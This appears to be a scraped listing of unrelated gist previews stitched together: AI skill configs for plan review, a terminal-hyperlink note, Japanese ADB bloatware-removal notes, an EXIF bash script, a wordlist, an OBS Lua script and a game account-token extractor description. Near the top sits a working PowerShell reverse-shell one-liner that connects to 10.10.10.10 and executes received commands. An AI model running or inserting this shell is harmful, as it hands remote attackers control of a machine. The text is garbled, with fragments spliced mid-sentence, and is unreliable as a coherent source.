name: plan-mega-review
version: 2.0.0
description: |
The most thorough plan review possible. Three modes: SCOPE EXPANSION (dream big,
build the cathedral), HOLD SCOPE (review what's here with maximum rigor), and
SCOPE REDUCTION (strip to essentials). Context-dependent defaults, but when the
user says EXPANSION — go full send. Challenges premises, maps every failure mode,Discover gists
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
| --- | |
| name: plan-exit-review | |
| version: 2.0.0 | |
| description: | | |
| Review a plan thoroughly before implementation. Challenges scope, reviews | |
| architecture/code quality/tests/performance, and walks through issues | |
| interactively with opinionated recommendations. | |
| allowed-tools: | |
| - Read | |
| - Grep |
[ Update 2025-03-24: Commenting is disabled permanently. Previous comments are archived at web.archive.org. ]
Most of the terminal emulators auto-detect when a URL appears onscreen and allow to conveniently open them (e.g. via Ctrl+click or Cmd+click, or the right click menu).
It was, however, not possible until now for arbitrary text to point to URLs, just as on webpages.
ADBを構築済みの環境でコマンドを流すことでAura from UnityとDigital Turbineをシステム上から擬似的に消し去ります。
ADBの環境構築はこちらを使えです。
これらのアプリはシステムアプリとして存在し、「AppCloud」「AppSelector」「MobileServices」「AppServices」と様々な名前になっているのが特徴になります。ただしパッケージ名には共通点が存在するので運営元の把握は可能になっています。
元々はイスラエルのIT企業、ironSourceが提供していたサービスです。
現在ironSourceはUnityに買収されており、Aura from Unityになっています。
| #!/bin/bash | |
| # Sets EXIF date on an image based on YYYY-MM-DD pattern in filename or manual date. | |
| set -euo pipefail | |
| show_help() { | |
| cat <<EOF | |
| Usage: $(basename "$0") [OPTIONS] <image> | |
| Sets EXIF date on an image file. Extracts date from YYYY-MM-DD pattern in | |
| filename, or uses manually specified date. Skips if EXIF date already exists. |
| aahed | |
| aalii | |
| aapas | |
| aargh | |
| aarti | |
| abaca | |
| abaci | |
| aback | |
| abacs | |
| abaft |
| local obs = obslua | |
| local ffi = require("ffi") | |
| local winmm = ffi.load("Winmm") | |
| -- Put a sound of your choosing next to "Beep on replay save.lua" and don't forget to match its name either in code below or rename your file. | |
| PROP_AUDIO_FILEPATH = script_path() .. "sound_npc_scanner_scanner_photo1.wav" | |
| ffi.cdef[[ | |
| bool PlaySound(const char *pszSound, void *hmod, uint32_t fdwSound); | |
| ]] |
Provides an easy way to extract your account token for use in scouting / headhunting tracking tools such as EndfieldTools.DEV without needing the Windows version of the game.
Mostly useful for those playing on PS5, iOS, and Android.
Supports Asia, NA/EU, and China servers. (※ China is untested.)
Windows版のゲームを使わなくても「EndfieldTools.DEV」などのスカウト履歴ツールで利用できるアカウントトークンを簡単に抽出できます。
主にPS5、iOS、Androidでプレイしている方に便利です。